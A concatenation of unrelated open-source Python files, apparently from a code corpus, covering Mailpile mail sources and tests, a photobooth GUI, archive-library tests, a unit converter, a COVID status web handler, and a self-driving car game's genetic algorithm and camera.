self._sleeping = after
def rescan_now(self, session=None, started_callback=None):
begin, end = MSrcLock(), MSrcLock()
for l in (begin, end):
l.acquire()
try:
self._rescan_waiters.append((begin, end, session))
self.wake_up()
while not begin.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
if started_callback:
started_callback()
while not end.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
return self._last_rescan_count
except KeyboardInterrupt:
self.interrupt_rescan(_('User aborted'))
raise
finally:
for l in (begin, end):
try:
l.release()
except thread.error:
pass
def quit(self, join=False):
self.interrupt_rescan(_('Shut down'))
self.alive = False
self.wake_up()
if join:
self.join()
def ProcessNew(session, msg, msg_ts, keywords, snippet):
if 'r' in msg.get('status', '').lower():
return False
keywords.update(['%s:in' % tag._key for tag in
session.config.get_tags(type='unread')])
return True
def MailSource(session, my_config):
    # FIXME: check the plugin and instantiate the right kind of mail source
# for this config section.
if my_config.protocol in ('mbox',):
from mailpile.mail_source.mbox import MboxMailSource
return MboxMailSource(session, my_config)
elif my_config.protocol in ('maildir',):
from mailpile.mail_source.maildir import MaildirMailSource
return MaildirMailSource(session, my_config)
elif my_config.protocol in ('imap', 'imap_ssl'):
from mailpile.mail_source.imap import ImapMailSource
return ImapMailSource(session, my_config)
raise ValueError(_('Unknown mail source protocol: %s'
) % my_config.protocol)
```
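`BaseMailSource._sorted_mailboxes()` above orders mailboxes by a tuple key so that inboxes come first, then sent folders, then everything else alphabetically. A minimal sketch of the same key applied to plain strings (the real code sorts Mailpile mailbox config objects):
```python
# Sketch of the _sorted_mailboxes() ordering, applied to plain names.
names = ["Archive", "Sent Items", "INBOX", "Drafts"]
ordered = sorted(names, key=lambda n: ('inbox' in n.lower() and 1 or 2,
                                       'sent' in n.lower() and 1 or 2,
                                       n))
# ordered == ['INBOX', 'Sent Items', 'Archive', 'Drafts']
```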
#### File: mailpile/plugins/html_magic.py
```python
import mailpile.config
from mailpile.commands import Command
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.plugins import PluginManager
from mailpile.urlmap import UrlMap
from mailpile.util import *
_plugins = PluginManager(builtin=__file__)
##[ Configuration ]###########################################################
#mailpile.plugins.register_config_section('tags', ["Tags", {
# 'name': ['Tag name', 'str', ''],
#}, {}])
#
#mailpile.plugins.register_config_variables('sys', {
# 'writable_tags': ['DEPRECATED', 'str', []],
#})
##[ Commands ]################################################################
class JsApi(Command):
"""Output API bindings, plugin code and CSS as CSS or Javascript"""
SYNOPSIS = (None, None, 'jsapi', None)
ORDER = ('Internals', 0)
HTTP_CALLABLE = ('GET', )
HTTP_AUTH_REQUIRED = 'Maybe'
def command(self, save=True, auto=False):
session, config = self.session, self.session.config
urlmap = UrlMap(session)
res = {
'api_methods': [],
'javascript_classes': [],
'css_files': []
}
for method in ('GET', 'POST', 'UPDATE', 'DELETE'):
for cmd in urlmap._api_commands(method, strict=True):
cmdinfo = {
"url": cmd.SYNOPSIS[2],
"method": method
}
if hasattr(cmd, 'HTTP_QUERY_VARS'):
cmdinfo["query_vars"] = cmd.HTTP_QUERY_VARS
if hasattr(cmd, 'HTTP_POST_VARS'):
cmdinfo["post_vars"] = cmd.HTTP_POST_VARS
if hasattr(cmd, 'HTTP_OPTIONAL_VARS'):
cmdinfo["optional_vars"] = cmd.OPTIONAL_VARS
res['api_methods'].append(cmdinfo)
created_js = []
for cls, filename in sorted(list(
config.plugins.get_js_classes().iteritems())):
try:
parts = cls.split('.')[:-1]
for i in range(1, len(parts)):
parent = '.'.join(parts[:i+1])
if parent not in created_js:
res['javascript_classes'].append({
'classname': parent,
'code': ''
})
created_js.append(parent)
with open(filename, 'rb') as fd:
res['javascript_classes'].append({
'classname': cls,
'code': fd.read().decode('utf-8')
})
created_js.append(cls)
except (OSError, IOError, UnicodeDecodeError):
self._ignore_exception()
for cls, filename in sorted(list(
config.plugins.get_css_files().iteritems())):
try:
with open(filename, 'rb') as fd:
res['css_files'].append({
'classname': cls,
'css': fd.read().decode('utf-8')
})
except (OSError, IOError, UnicodeDecodeError):
self._ignore_exception()
return self._success(_('Generated Javascript API'), result=res)
_plugins.register_commands(JsApi)
```
#### File: Mailpile/tests/test_crypto_policy.py
```python
from mailpile.vcard import MailpileVCard, VCardLine
from tests import MailPileUnittest
VCARD_CRYPTO_POLICY = 'X-MAILPILE-CRYPTO-POLICY'
class CryptoPolicyBaseTest(MailPileUnittest):
def setUp(self):
self.config.vcards.clear()
def _add_vcard(self, full_name, email):
card = MailpileVCard(VCardLine(name='fn', value=full_name),
VCardLine(name='email', value=email))
self.config.vcards.index_vcard(card)
return card
class CryptoPolicyAutoSetAll(CryptoPolicyBaseTest):
def test_command_is_executable(self):
res = self.mp.crypto_policy_auto_set_all()
self.assertIsNotNone(res)
def test_vcard_gets_updated(self):
self._add_vcard('Signer', '<EMAIL>')
self._add_vcard('Encrypter', '<EMAIL>')
res = self.mp.crypto_policy_auto_set_all()
self.assertEqual({'<EMAIL>', '<EMAIL>'}, res.as_dict()['result'])
signer_vcard = self.config.vcards.get_vcard('<EMAIL>')
encrypter_vcard = self.config.vcards.get_vcard('<EMAIL>')
self.assertEqual('sign', signer_vcard.get(VCARD_CRYPTO_POLICY).value)
self.assertEqual('encrypt', encrypter_vcard.get(VCARD_CRYPTO_POLICY).value)
class UpdateCryptoPolicyForUserTest(CryptoPolicyBaseTest):
def test_args_are_checked(self):
self.assertEqual('error', self.mp.crypto_policy_set().as_dict()['status'])
self.assertEqual('error', self.mp.crypto_policy_set('one arg').as_dict()['status'])
def test_policies_are_validated(self):
self._add_vcard('Test', '<EMAIL>')
for policy in ['default', 'none', 'sign', 'encrypt']:
self.assertEqual('success', self.mp.crypto_policy_set('<EMAIL>', policy).as_dict()['status'])
for policy in ['anything', 'else']:
res = self.mp.crypto_policy_set('<EMAIL>', policy).as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('Policy has to be one of none|sign|encrypt|sign-encrypt|default',
res['message'])
def test_vcard_has_to_exist(self):
res = self.mp.crypto_policy_set('<EMAIL>', 'sign').as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('No vcard for email <EMAIL>!', res['message'])
def test_vcard_is_updated(self):
vcard = self._add_vcard('Test', '<EMAIL>')
for policy in ['none', 'sign', 'encrypt']:
self.mp.crypto_policy_set('<EMAIL>', policy)
self.assertEqual(policy, vcard.get(VCARD_CRYPTO_POLICY).value)
def test_default_policy_removes_vcard_line(self):
vcard = self._add_vcard('Test', '<EMAIL>')
vcard.add(VCardLine(name=VCARD_CRYPTO_POLICY, value='sign'))
self.mp.crypto_policy_set('<EMAIL>', 'default')
self.assertEqual(0, len(vcard.get_all(VCARD_CRYPTO_POLICY)))
class CryptoPolicyForUserTest(CryptoPolicyBaseTest):
def test_no_email_provided(self):
res = self.mp.crypto_policy().as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('Please provide a single email address!', res['message'])
def test_no_msg_with_email_(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('none', res['result'])
def test_with_signed_email(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('sign', res['result'])
def test_with_encrypted_email(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('encrypt', res['result'])
def test_vcard_overrides_mail_history(self):
vcard = self._add_vcard('Encrypter', '<EMAIL>')
vcard.add(VCardLine(name=VCARD_CRYPTO_POLICY, value='sign'))
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('sign', res['result'])
``` |
{
"source": "jocelyngate38/photobooth-software",
"score": 2
} |
#### File: jocelyngate38/photobooth-software/gif.py
```python
from PyQt5.QtCore import (QFile, QFileInfo, QPoint, QRect, QRectF, QSettings, QSize,
Qt, QTextStream, QThread, pyqtSignal, pyqtSlot, QTimer, QDateTime, QIODevice, QElapsedTimer)
from PyQt5.QtGui import QIcon, QKeySequence, QFont, QPixmap, QPainter, QPen, QColor, QMovie
from PyQt5.QtWidgets import (QMenu, QAction, QLabel, QApplication, QMainWindow)
import platform
if platform.system() == 'Windows':
EMULATE = True
else:
EMULATE = False
import RPi.GPIO as GPIO
import pyautogui
from random import randint
from random import randrange
from datetime import datetime
from ressourceManager import *
import threading, time, random, shutil, os, subprocess
import glob
import json
from subprocess import Popen, PIPE, check_output
from boothFilters import *
import uuid
from enum import Enum
class Label(QLabel):
ribbonEmptyRight = True
trayMissingRight = True
paperEmptyRight = True
ribbonEmptyLeft = True
trayMissingLeft = True
paperEmptyLeft = True
def setRibbonEmptyRight(self, b):
self.ribbonEmptyRight = b
    def setPaperEmptyRight(self, b):
        self.paperEmptyRight = b
    def setTrayMissingRight(self, b):
        self.trayMissingRight = b
def setRibbonEmptyLeft(self, b):
self.ribbonEmptyLeft = b
    def setPaperEmptyLeft(self, b):
        self.paperEmptyLeft = b
    def setTrayMissingLeft(self, b):
        self.trayMissingLeft = b
def __init__(self, parent=None):
super(Label, self).__init__(parent=parent)
def paintEvent(self, e):
iL = 0
jL = 0
iR = 1280-229
jR = 0
incw = 0
inch = 85
super().paintEvent(e)
qp = QPainter(self)
if self.ribbonEmptyLeft is True:
qp.drawPixmap(iL, jL, QPixmap("ribbonEmpty.png"))
iL = iL + incw
jL = jL + inch
if self.trayMissingLeft is True:
qp.drawPixmap(iL, jL, QPixmap("trayMissing.png"))
iL = iL + incw
jL = jL + inch
if self.paperEmptyLeft is True:
qp.drawPixmap(iL, jL, QPixmap("paperEmpty.png"))
if self.ribbonEmptyRight is True:
qp.drawPixmap(iR, jR, QPixmap("ribbonEmpty.png"))
iR = iR + incw
jR = jR + inch
if self.trayMissingRight is True:
qp.drawPixmap(iR, jR, QPixmap("trayMissing.png"))
iR = iR + incw
jR = jR + inch
if self.paperEmptyRight is True:
qp.drawPixmap(iR, jR, QPixmap("paperEmpty.png"))
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.movie = None
self.label = None
self.showFullScreen()
self.initGUI()
self.showHomePage()
QApplication.processEvents()
QApplication.processEvents()
def initGUI(self):
self.label = Label()
self.label.setFont(QFont("Right Chalk", 110, QFont.Bold))
self.label.setAlignment(Qt.AlignCenter)
self.label.setScaledContents(True)
self.label.setMinimumHeight(1024)
self.label.setMinimumWidth(1280)
self.label.setMaximumHeight(1024)
self.label.setMaximumWidth(1280)
self.setCentralWidget(self.label)
self.movie = QMovie("home.gif")
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.loopCount()
def showHomePage(self):
# if self.trayMissing is True:
# if self.paperEmpty is True:
# if self.ribbonEmpty is True:
self.label.setMovie(self.movie)
self.movie.start()
QApplication.processEvents()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
mainWin = MainWindow()
# sim = SimulatorButtonThread(mainWin, 1)
# sim.start()
mainWin.show()
ret = app.exec_()
sys.exit(ret)
``` |
{
"source": "JocelynHeckenkamp/Django-Duoboard",
"score": 2
} |
#### File: Django-Duoboard/duo/models.py
```python
from django.db import models
class User(models.Model):
username = models.CharField(max_length=255)
profile = models.CharField(max_length=255)
img = models.CharField(max_length=255)
streak = models.IntegerField(default=0)
xp = models.IntegerField(default=0)
lingots = models.IntegerField(default=0)
def __str__(self):
return self.username
class Username(models.Model):
username = models.CharField(max_length=255)
def __str__(self):
return self.username
``` |
{
"source": "jocelynj/PyEasyArchive",
"score": 3
} |
#### File: PyEasyArchive/dev/archive.py
```python
import sys
sys.path.insert(0, '..')
import os
import logging
def configure_logging():
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
configure_logging()
os.environ['DYLD_LIBRARY_PATH'] = '/Users/dustin/build/libarchive/build/libarchive'
import libarchive.public
import libarchive.constants
#with libarchive.file_enumerator('test.7z') as e:
# for entry in e:
# print(entry)
#with open('test.7z', 'rb') as f:
# buffer_ = f.read()
# with libarchive.memory_enumerator(buffer_) as e:
# for entry in e:
# print(entry)
#with libarchive.file_reader('test.7z') as e:
# for entry in e:
# with open('/tmp/' + str(entry), 'wb') as f:
# for block in entry.get_blocks():
# f.write(block)
#with open('test.7z', 'rb') as f:
# buffer_ = f.read()
# with libarchive.memory_reader(buffer_) as e:
# for entry in e:
# with open('/tmp/' + str(entry), 'wb') as f:
# for block in entry.get_blocks():
# f.write(block)
def create_7z():
for entry in libarchive.public.create_file(
'create.7z',
libarchive.constants.ARCHIVE_FORMAT_7ZIP,
['/etc/profile']):
print("Adding: %s" % (entry))
#create_7z()
#with open('/tmp/new.7z', 'wb') as f:
# def writer(buffer_, length):
# f.write(buffer_)
# return length
#
# def opener():
# print("Opening.")
#
# def closer():
# print("Closing.")
#
# for entry in libarchive.create_generic(
# writer,
# open_cb=opener,
# close_cb=closer,
# format_name='7z',
# files=['/etc/profile']):
# print("Adding: %s" % (entry))
#libarchive.create_file('create.7z', '7z', ['/etc/profile'])
#libarchive.create_memory('7z', [])
def expand_deb_memory():
with open('/Users/dustin/Downloads/op-adam-665.deb', 'rb') as f:
buffer_ = f.read()
with libarchive.public.memory_reader(
buffer_,
# format_code=libarchive.constants.ARCHIVE_FORMAT_ZIP
) as e:
for entry in e:
path = '/tmp/deb/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
with open('/tmp/deb/data.tar.gz', 'rb') as f:
buffer_ = f.read()
with libarchive.public.memory_reader(
buffer_,
format_code=libarchive.constants.ARCHIVE_FORMAT_TAR_USTAR,
filter_code=libarchive.constants.ARCHIVE_FILTER_GZIP
) as e:
for entry in e:
# print(entry)
# print(entry.mtime)
path = '/tmp/data/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
expand_deb_memory()
def expand_deb_file():
with libarchive.public.file_reader('/Users/dustin/Downloads/op-adam-665.deb') as e:
for entry in e:
with open('/tmp/deb/' + str(entry), 'wb') as f:
for block in entry.get_blocks():
f.write(block)
with libarchive.public.file_reader('/tmp/deb/data.tar.gz') as e:
for entry in e:
path = '/tmp/data/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
#expand_deb_file()
def pour_deb_file():
os.chdir('/tmp/deb')
for e in libarchive.public.file_pour('/Users/dustin/Downloads/op-adam-665.deb'):
#print(e)
pass
#print('')
os.chdir('/tmp/data')
for e in libarchive.public.file_pour('/tmp/deb/data.tar.gz'):
#print(e)
pass
#pour_deb_file()
def pour_deb_memory():
os.chdir('/tmp/deb')
with open('/Users/dustin/Downloads/op-adam-665.deb', 'rb') as f:
for e in libarchive.public.memory_pour(f.read()):
#print(e.filetype)
pass
#print('')
os.chdir('/tmp/data')
with open('/tmp/deb/data.tar.gz', 'rb') as f:
for e in libarchive.public.memory_pour(f.read()):
#print(e)
pass
#pour_deb_memory()
```
#### File: PyEasyArchive/libarchive/library.py
```python
import logging
import os
import ctypes
import ctypes.util
_LOGGER = logging.getLogger(__name__)
_LIBRARY_NAME = 'archive'
_LIBRARY_FILENAME = 'libarchive.so'
def find_and_load_library():
search_filepaths = []
# Search for the library using our own environment variable.
filepath = os.environ.get('LA_LIBRARY_FILEPATH', '')
if filepath != '':
search_filepaths.append(filepath)
# Search for the library using the well-defined system library search-path.
_SEARCH_PATH = os.environ.get('LD_LIBRARY_PATH', '')
if _SEARCH_PATH != '':
for path in _SEARCH_PATH.split(":"):
filepath = os.path.join(path, _LIBRARY_FILENAME)
search_filepaths.append(filepath)
# Load the first one available.
found_filepath = None
for filepath in search_filepaths:
if os.path.exists(filepath) is True:
return filepath
# Search for our library using whatever search-path ctypes uses (not the same
# as `LD_LIBRARY_PATH`).
filepath = ctypes.util.find_library(_LIBRARY_NAME)
if filepath is not None:
return filepath
    # Fall back to naively trying to load the filename.
_LOGGER.debug("Using default library file-path: [%s]", _LIBRARY_FILENAME)
return _LIBRARY_FILENAME
_FILEPATH = find_and_load_library()
_LOGGER.debug("Using library file-path: [%s]", _FILEPATH)
libarchive = ctypes.cdll.LoadLibrary(_FILEPATH)
```
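`find_and_load_library()` resolves libarchive in a fixed order: the `LA_LIBRARY_FILEPATH` environment variable, each directory on `LD_LIBRARY_PATH`, `ctypes.util.find_library('archive')`, and finally the bare filename. A hedged usage sketch, pointing the loader at a custom build (the path shown is only an example):
```python
# Point the loader at a custom libarchive build before the module is imported.
# The filepath below is an example, not a requirement of the package.
import os
os.environ['LA_LIBRARY_FILEPATH'] = '/opt/libarchive/lib/libarchive.so'

import libarchive.library  # find_and_load_library() runs at import time
```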
#### File: tests/adapters/test_archive_write.py
```python
import unittest
import os
import shutil
import contextlib
import tempfile
import libarchive.adapters.archive_write
import libarchive.adapters.archive_read
import libarchive.constants
import libarchive.test_support
_APP_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..')
# TODO(dustin): Add tests for file and memory pouring.
class TestArchiveWrite(unittest.TestCase):
def test_create_file(self):
with libarchive.test_support.chdir(_APP_PATH):
temp_path = tempfile.mkdtemp()
output_filename = 'archive.7z'
output_filepath = os.path.join(temp_path, output_filename)
try:
files = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
]
libarchive.adapters.archive_write.create_file(
output_filepath,
libarchive.constants.ARCHIVE_FORMAT_TAR,
files,
filter_code=libarchive.constants.ARCHIVE_FILTER_BZIP2)
assert \
os.path.exists(output_filepath) is True, \
"Test archive was not created correctly."
with libarchive.adapters.archive_read.file_enumerator(output_filepath) as e:
actual = [entry.pathname for entry in e]
finally:
try:
shutil.rmtree(temp_path)
except:
pass
expected = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
]
self.assertEquals(actual, expected)
def test_create_file__unicode(self):
with libarchive.test_support.chdir(_APP_PATH):
temp_path = tempfile.mkdtemp()
output_filename = 'archive.7z'
output_filepath = os.path.join(temp_path, output_filename)
# Also, write a source file with a unicode name that we can add to
            # test internationalization support.
unicode_test_filepath = \
os.path.join(
temp_path,
"\u0905\u0906\u0907\u0536\u0537\u0538\u0539\u053a\u053b\uac12\uac13\uac14\uac15\uac16")
with open(unicode_test_filepath, 'w') as f:
f.write("test data \uf91f\uf920\uf921\uf922\uf923\uf924\uf925")
try:
files = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
unicode_test_filepath,
]
libarchive.adapters.archive_write.create_file(
output_filepath,
libarchive.constants.ARCHIVE_FORMAT_TAR,
files,
filter_code=libarchive.constants.ARCHIVE_FILTER_BZIP2)
assert \
os.path.exists(output_filepath) is True, \
"Test archive was not created correctly."
with libarchive.adapters.archive_read.file_enumerator(output_filepath) as e:
actual = [entry.pathname for entry in e]
finally:
try:
shutil.rmtree(temp_path)
except:
pass
expected = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
unicode_test_filepath.lstrip(os.sep),
]
self.assertEquals(actual, expected)
``` |
{
"source": "jocelynlopez/unit_converter",
"score": 4
} |
#### File: unit_converter/unit_converter/converter.py
```python
from decimal import Decimal as D
from unit_converter.parser import QuantityParser, UnitParser
def convert(quantity: str, desired_unit: str) -> D:
"""
:param quantity:
:param desired_unit:
:return:
Examples :
----------
>>> from unit_converter import convert
>>> convert('2.78 daN*mm^2', 'mN*µm^2')
Decimal('2.78E+10')
"""
quantity = QuantityParser().parse(quantity)
desired_unit = UnitParser().parse(desired_unit)
return quantity.convert(desired_unit).value
def converts(quantity: str, desired_unit: str) -> str:
"""
:param quantity:
:param desired_unit:
:return:
Examples :
----------
    >>> from unit_converter import converts
    >>> converts('2.78 daN*mm^2', 'mN*µm^2')
    '2.78E+10'
"""
return str(convert(quantity, desired_unit))
if __name__ == "__main__":
import doctest
doctest.testmod()
```
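Both helpers parse the quantity, convert it to the desired unit, and differ only in the return type: `convert()` returns a `Decimal`, `converts()` its string form. A short usage sketch based on the doctests above, importing straight from the module shown:
```python
from unit_converter.converter import convert, converts

convert('2.78 daN*mm^2', 'mN*µm^2')   # Decimal('2.78E+10')
converts('2.78 daN*mm^2', 'mN*µm^2')  # '2.78E+10'
```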
#### File: unit_converter/unit_converter/parser.py
```python
import re
from decimal import Decimal as D
from functools import reduce
from unit_converter.data import PREFIXES, UNITS
from unit_converter.exceptions import UnitDoesntExistError
from unit_converter.units import Unit, Quantity
def parse(quantity: str) -> Quantity:
return QuantityParser().parse(quantity)
class QuantityParser(object):
quantity_re = re.compile("(?P<value>\d+[.,]?\d*)? *(?P<unit>.*)")
def parse(self, quantity: str) -> Quantity:
r = self.quantity_re.match(quantity)
unit = UnitParser().parse(r.group("unit"))
if r.group("value") is not None:
if ',' in r.group("value"):
value = D(r.group("value").replace(',', '.'))
else:
value = D(r.group("value"))
return Quantity(value, unit)
else:
return unit
class UnitParser(object):
unit_re = re.compile("(?P<unit>[a-zA-Z°Ωµ]+)\^?(?P<pow>[-+]?[0-9]*\.?[0-9]*)")
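    # For example, unit_re.findall("daN*mm^2") -> [('daN', ''), ('mm', '2')]:
    # each unit symbol is captured together with its (possibly empty) power.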
def parse(self, unit: str) -> Unit:
l_unit_s = self.unit_re.findall(unit)
l_unit = [self._parse_unit(unit, power) for unit, power in l_unit_s]
return reduce(lambda x, y: x * y, l_unit)
def _parse_unit(self, unit: str, power: str) -> Unit:
        if power == '':
return self._parse_simple_unit(unit)
else:
return self._parse_simple_unit(unit) ** float(power)
@staticmethod
def _parse_simple_unit(unit_s: str) -> Unit:
"""Parse a simple unit.
In other word, parse an unit without a power value.
"""
unit = None
for prefix in PREFIXES.keys():
if unit_s.startswith(prefix) and unit_s[len(prefix):] in UNITS.keys():
unit = UNITS[unit_s[len(prefix):]]
prefix = PREFIXES[prefix]
break
if unit is None:
raise UnitDoesntExistError(unit_s)
return prefix*unit
``` |
{
"source": "jocelynshen/6.08-COVID-Load-Balancer",
"score": 3
} |
#### File: jocelynshen/6.08-COVID-Load-Balancer/updateCovidStatus.py
```python
import json
import sqlite3
import datetime
import requests
import string
import time
visits_db = '__HOME__/locations.db'
def request_handler(request):
if (request['method']=='POST'):
if 'user' in request['form'] and 'password' in request['form'] and 'confirmed' in request['form']:
user = str(request['form']['user'])
confirmed_state = str(request['form']['confirmed'])
time_now = datetime.datetime.now()
conn = sqlite3.connect(visits_db) # connect to that database (will create if it doesn't already exist)
c = conn.cursor() # move cursor into database (allows us to execute commands)
two_weeks_ago = time_now- datetime.timedelta(days = 14)
c.execute('''DELETE FROM locations_table WHERE time < ?;''', (two_weeks_ago,))
if (confirmed_state == 'true'):
sql = ''' UPDATE locations_table
SET con = 1
WHERE username = ?'''
c.execute(sql,(user,))
elif (confirmed_state == 'false'):
sql = ''' UPDATE locations_table
SET con = 0
WHERE username = ?'''
c.execute(sql,(user,))
conn.commit() # commit commands
conn.close() # close connection to database
return "COVID state changed for "+user
return "Invalid Request"
``` |
{
"source": "jocelynthiojaya/Self-Learning-Cars",
"score": 3
} |
#### File: Self-Learning-Cars/carbrain/geneticAlgorithm.py
```python
import random
import numpy as np
class geneticAlgorithm:
def __init__(self, parents1, parents2):
self.parents1 = parents1
self.parents2 = parents2
self.child1 = []
self.child2 = []
def crossover(self, alt=False):
""" Crossover genetic function. alt is for alternative random splicing """
if len(self.parents1) == len(self.parents2):
#check the size of the parents.
#get the size of parents
sizeParents = len(self.parents1)
if alt:
#generate random numbers to slice the parents into several parts.
slice_parents = random.randint(2, sizeParents-1)
#determine the crossover point. Generate random number to determine the bound for crossover point
crossover_array = np.array([random.randint(1,(sizeParents-1)) for _ in range(slice_parents)])
crossover_array.sort()
#remove duplicate numbers
crossover_array = list(dict.fromkeys(crossover_array))
#count the number of slices again.
slice_parents = len(crossover_array)
#do the crossover
for i in range(slice_parents):
bounds_top = crossover_array[i]
#print(bounds_top)
bounds_low = crossover_array[i-1]
if len(self.child1) == 0 :
self.child1 = np.concatenate([self.child1, self.parents1[0:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents2[0:bounds_top]])
flag_parents = 1
# if the flag is 1, it will take the value from parents 2 for child 1 and parents 1 for child 2
elif flag_parents == 1:
self.child1 = np.concatenate([self.child1, self.parents2[bounds_low:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents1[bounds_low:bounds_top]])
flag_parents = 0
# if the flag is 0, it will take the value from parents 1 for child 1 and parents 2 for child 2
elif flag_parents == 0 and len(self.child1) != 0:
self.child1 = np.concatenate([self.child1, self.parents1[bounds_low:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents2[bounds_low:bounds_top]])
flag_parents = 1
                # This handles the tail segment after the last crossover point.
if flag_parents == 0:
self.child1 = np.concatenate([self.child1, self.parents1[bounds_top:]])
self.child2 = np.concatenate([self.child2, self.parents2[bounds_top:]])
elif flag_parents == 1:
self.child1 = np.concatenate([self.child1, self.parents2[bounds_top:]])
self.child2 = np.concatenate([self.child2, self.parents1[bounds_top:]])
else:
crossover_point = random.randint(1,(sizeParents - 1))
self.child1 = list(np.concatenate([self.parents1[0:crossover_point], self.parents2[crossover_point:]]))
self.child2 = list(np.concatenate([self.parents2[0:crossover_point], self.parents1[crossover_point:]]))
return self.child1, self.child2
def mutation(self, percentage=0.1, alt=False):
""" Percentage dictates how many value will be mutated. (0.0-1.0) """
self.crossover(alt)
#generate the random numbers to find the gene that we want to swap.
for _ in range(int(38*percentage)):
random_numbers = random.randint(0,37)
self.child1[random_numbers] = random.random()
self.child2[random_numbers] = random.random()
return self.child1, self.child2
# parents1 = np.array([1 for _ in range(38)])
# parents2 = np.array([0 for _ in range(38)])
# #print("parents1 = " , parents1)
# #print("parents2 = " , parents2)
# g1 = geneticAlgorithm(parents1,parents2)
# print(list(g1.mutation()[1]))
```
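The commented-out lines above hint at the intended call pattern. A minimal usage sketch follows, assuming the `carbrain` package layout from the file header; the 38-gene length matters because `mutation()` hard-codes gene indices 0–37:
```python
# Usage sketch; geneticAlgorithm expects 38-gene parents because mutation()
# draws gene indices in the range 0..37.
import numpy as np
from carbrain.geneticAlgorithm import geneticAlgorithm

parents1 = np.ones(38)
parents2 = np.zeros(38)
ga = geneticAlgorithm(parents1, parents2)
child1, child2 = ga.crossover()        # single-point crossover
m1, m2 = ga.mutation(percentage=0.1)   # crossover plus ~10% random genes
print(len(child1), len(m1))            # 38 38
```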
#### File: Self-Learning-Cars/cargame/camera.py
```python
import arcade
from cargame.globals import conf
from cargame import util
# This math is for getting the ratio from zoom. I honestly
# don't know what it is called, i just constructed it by hand
# Long form is 1 - (x - 1) / 2
zoom_multiplexer = lambda x : (3 - x)/2
# TODO: Implement anchor
class Camera:
def __init__(self, left_bound, bottom_bound, right_bound, top_bound):
""" Set every camera variables
s_width: Screen width
s_height: Screen height
"""
self.x = 0
self.y = 0
self.right = conf["screen_width"]
self.top = conf["screen_height"]
# Camera bounds
self.left_bound = left_bound
self.bottom_bound = bottom_bound
self.right_bound = right_bound
self.top_bound = top_bound
# The zoom of the main canvas
self.zoom = 1
# Whether zoom is enabled.
self.can_zoom = True
# Marker when camera port will be updated this frame
self.moved = False
def on_start_update(self):
""" Will be run at the beginning of them main update function """
self.moved = False
def handle_border(self):
""" Handles if the camera went out of bounds """
bound_left = self.x < self.left_bound
bound_right = self.right > self.right_bound
if bound_left or bound_right:
x_diff = self.left_bound - self.x if bound_left else self.right_bound - self.right
self.x += x_diff
self.right += x_diff
bound_bot = self.y < self.bottom_bound
bound_top = self.top > self.top_bound
if bound_bot or bound_top:
y_diff = self.bottom_bound - self.y if bound_bot else self.top_bound - self.top
self.y += y_diff
self.top += y_diff
def update_camera_pos(self, x=None, y=None, zoom=None):
"""
Updates the position according to the x, y, and zoom
"""
# Mark camera as moved this frame
self.moved = True
# Move and do maths
zoom_mult = zoom_multiplexer(self.zoom)
if x != None:
self.right = x + conf["screen_width"] * zoom_mult
self.x = x
if y != None:
self.top = y + conf["screen_height"] * zoom_mult
self.y = y
self.handle_border()
# print("Port size: ({}, {}) zoom: {}".format(self.right - self.x, self.top - self.y, self.zoom))
def update_zoom(self, zoom, anchor_x, anchor_y):
""" Updates the zoom of the main canvas """
# Check first whether zoom is enabled
if not self.can_zoom: return
# Mark camera as moved
self.moved = True
# Clamp the zoom
zoom = util.clamp(zoom, -5.0, 2.95)
# Calculate zoom increment
zoom_inc = self.zoom - zoom
# Get the linear interpolation so that the zoom is
# focused on the anchor
x_lerp = util.invlerp(0, conf["screen_width"], anchor_x)
y_lerp = util.invlerp(0, conf["screen_height"], anchor_y)
# print("x: {} y: {} right: {} top: {}".format(self.x, self.y, self.right, self.top))
# print("xlerp: {} ylerp: {}".format(x_lerp, y_lerp))
# Camera view ports
lp = self.x - (x_lerp * conf["screen_width"] * zoom_inc) / 2
bp = self.y - (y_lerp * conf["screen_height"] * zoom_inc) / 2
rp = self.right + ((1-x_lerp) * conf["screen_width"] * zoom_inc) / 2
tp = self.top + ((1-y_lerp) * conf["screen_height"] * zoom_inc) / 2
# If camera view port is within the bounds, do the zoom.
if (rp - lp) < (self.right_bound - self.left_bound) and (tp - bp) < (self.top_bound - self.bottom_bound):
# Calculate the camera maths here
self.x = lp
self.y = bp
self.right = rp
self.top = tp
self.zoom = round(zoom, 3)
self.handle_border()
